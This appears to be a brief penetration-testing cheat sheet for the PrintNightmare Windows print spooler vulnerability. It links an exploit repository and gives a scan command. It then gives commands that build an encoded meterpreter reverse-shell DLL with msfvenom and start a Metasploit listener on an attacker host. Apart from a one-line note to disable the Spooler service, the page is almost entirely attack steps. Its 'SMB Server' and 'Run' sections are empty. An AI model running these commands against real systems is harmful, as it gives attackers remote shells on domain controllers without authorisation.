PrintNightmare
PrintNightmare
https://github.com/cube0x0/CVE-2021-1675
NEEDS NEWEST IMPACKET
Scan for it
$ rpcdump.py @[dc-ip] | egrep 'MS-RPRN|MS-PAR'If a value is returned, it could be vulnerable
Attack
Use msfvenom to create a malicious dll
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[attacker machine] LPORT=[listener port] -f dll -e x64/shikata_ga_nai -i 5 -o shell.dllStart a meterpreter listener
msfconsole
use multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost [attacker ip]set lport [listener port]
SMB Server
Run
Defense
Disable Spooler Service
Last updated